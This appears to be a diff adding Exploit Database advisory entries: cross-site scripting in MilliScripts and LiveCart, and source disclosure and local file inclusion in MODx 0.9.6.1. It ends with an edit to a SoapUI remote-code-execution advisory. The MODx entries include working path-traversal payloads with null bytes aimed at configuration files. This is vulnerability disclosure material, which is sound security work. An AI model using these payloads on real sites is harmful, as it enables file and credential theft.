@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27078/info
+
+MilliScripts is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/PATH/dir.php?do=browse&cat=[XSS] 

platforms/php/webapps/30964.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27087/info
+
+LiveCart is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+LiveCart 1.0.1 is vulnerable to these issues; other versions may also be affected. 
+
+http://www.example.com/user/remindPassword?return=XSS

platforms/php/webapps/30965.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27087/info
+ 
+LiveCart is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+LiveCart 1.0.1 is vulnerable to these issues; other versions may also be affected. 
+
+http://www.example.com/category?id=1&q=XSS

platforms/php/webapps/30966.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27087/info
+  
+LiveCart is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+LiveCart 1.0.1 is vulnerable to these issues; other versions may also be affected. 
+
+http://www.example.com/order?return=order/XSS

platforms/php/webapps/30967.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27087/info
+   
+LiveCart is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+   
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+   
+LiveCart 1.0.1 is vulnerable to these issues; other versions may also be affected. 
+
+http://www.example.com/user/remindComplete?email=XSS 

platforms/php/webapps/30968.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27096/info
+
+MODx is prone to a vulnerability that allows attackers to access source code because the application fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the webserver process. Information obtained may aid in further attacks.
+
+MODx 0.9.6.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/modx-0.9.6.1/assets/js/htcmime.php?file=../../manager/includes/config.inc.php%00.htc 

platforms/php/webapps/30969.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/27097/info
+
+MODx is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to execute local script code in the context of the application. This may allow the attacker to access sensitive information that may aid in further attacks.
+
+MODx 0.9.6.1 is vulnerable to this issue; other versions may also be affected. 
+
+Method=POST
+Action=http://www.example.com/modx-0.9.6.1/index-ajax.php?
+Name=as_language Value=../ajaxSearch_readme.txt%00
+Name=q Value=assets/snippets/AjaxSearch/AjaxSearch.php 

platforms/windows/remote/30908.txt

@@ -9,13 +9,6 @@ http://www.soapui.org/Downloads/download-soapui-pro-trial.html
 # Tested on: Windows, should work at Linux as well
 # CVE : CVE-2014-1202
 
- 
-
-Hey guys.               
-
-My name is Barak Tawily, I work for Appsec-Labs as information security
-researcher.
-
 I have been found remote code execution vulnerability in the SoapUI product,
 which allows me to execute a java code to the victim's computer via
 malicious WSDL/WADL file.
@@ -51,13 +44,6 @@ will take over it.
 
 This vulnerability was check on the version (4.6.3), a proof of concept
 video can be found at: http://www.youtube.com/watch?v=3lCLE64rsc0
-
-malicious WSDL is attached.
-
-Please let me know if the vulnerability is about to publish
-
-Thanks, Barak.
-
  
 <?xml version="1.0"?>
 <definitions name="StockQuote"